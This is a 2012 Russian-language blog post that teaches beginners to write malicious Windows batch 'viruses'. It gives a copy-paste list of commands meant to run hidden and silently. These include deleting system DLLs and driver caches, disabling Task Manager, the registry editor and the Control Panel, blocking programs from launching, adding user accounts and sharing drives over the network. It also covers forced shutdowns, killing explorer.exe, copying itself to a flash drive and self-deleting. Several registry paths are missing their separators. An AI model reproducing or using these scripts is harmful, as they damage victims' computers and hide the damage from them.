| Меню сайта |
 | |
 |
| Наш опрос |
| |
|
| Статистика |
|
Онлайн всего: 1 Гостей: 1 Пользователей: 0 |
|
| Форма входа |
| |
|
|
 |  |  |
 | Главная » 2012 » Ноябрь » 6 » Написание Бат "вирусов" ( для новичков)
20:50 Написание Бат "вирусов" ( для новичков) |
Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat. Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак, для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот.
Пишем в блокноте:
time 00:00
copy %0 F:\Work.bat
Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск Ф - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число.
Команда time просто устанавливает любое время на часах ПК.
Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Параметр /q задаёт удаление без подтверждения.
Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название.
Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды.
Команда attrib +h +s ставит атрибут скрытный и системный.
Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение.
Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя.
Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью.
Команда taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением.
Команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку.
Небольшой перечень "хороших” и "нехороших” сценариев:
1. copy %0 a:\b - копирует выполняемый файл на диск a в папку b (например copy %0 C:\ program.bat);
2. date x.y.z - меняет дату на x день, y месяц, z год (например date 16.11.05);
3. time х:у - меняет время на х часов и у минут (например time 14:27);
4. label x:y - переименовывает диск x на имя y (например label C:Disc error);
5. del *.* /q - удалит все файлы в папке, где лежит наш сценарий (папки остаются);
6. del x:\y *.* /q - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
7. assoc .х=.у - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.txt);
8. md х - создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka);
9. net user "х" /add - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
10. +r Установка атрибута «Только чтение»;
11. -r - снятие атрибута «Только чтение»;
12. +a - установка атрибута «Архивный»;
13. -a - снятие атрибута «Архивный»;
14.+s - установка атрибута «Системный»;
15. -s - снятие атрибута «Системный»;
16. -h - снятие атрибута «Скрытый»;
17. +h - установка атрибута «Скрытый»;
18. attrib +h +s C:/WINDOWS - скрывается папка WINDOWS;
19. attrib +h +s C:/WINDOWS/*.* - скрываются файлы в папке WINDOWS;
20. del %0 – самоликвидация вируса (пишется в самом конце вируса);
21. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – запретить комбинацию клавиш Ctrl-Alt-Del;
22. del "%SystemRoot%system32*.dll" /q >nul – удалить все системные DLL(Динамические загружаемые библиотеки);
23. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – удалить все драйверы, установленные на компьютере;
24. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – поменять местами значения кнопок мыши;
25. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – делает невозможным запуск приложений;
26. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – запретить редактирование реестра вручную;
27. del "%SystemRoot%Cursors*.*" >nul – удалить курсор мыши;
28. del "%SystemRoot%Media" /q >nul – удалить системные звуки Windows;
29. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – запретить вызов панели управления;
30. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – убрать рабочий стол;
31. shutdown -r -t 1 -c "lol" -f >nul – форсираванная перезагрузка ПК;
32. shutdown -s -t 1 -c "lol" -f >nul – форсированное выключение ПК;
33. taskkill /f /im explorer.exe >nul – убить процесс Explorer.exe;
34. msg * "Текст сообщения" >nul – показать Windows-стилизованное сообщение с кнопкой ОК;
35. del "%0" >nul – самоликвидация вируса.
|
|
Просмотров: 2917 |
Добавил: Yojok
| Рейтинг: 5.0/2 |
|  |
 |  |
 |  |  |
|
| Поиск |
| |
|
| Календарь |
| | « Ноябрь 2012 » | | Пн | Вт | Ср | Чт | Пт | Сб | Вс | | | | | 1 | 2 | 3 | 4 | | 5 | 6 | 7 | 8 | 9 | 10 | 11 | | 12 | 13 | 14 | 15 | 16 | 17 | 18 | | 19 | 20 | 21 | 22 | 23 | 24 | 25 | | 26 | 27 | 28 | 29 | 30 |
|
|
| Архив записей |
| |
|
|
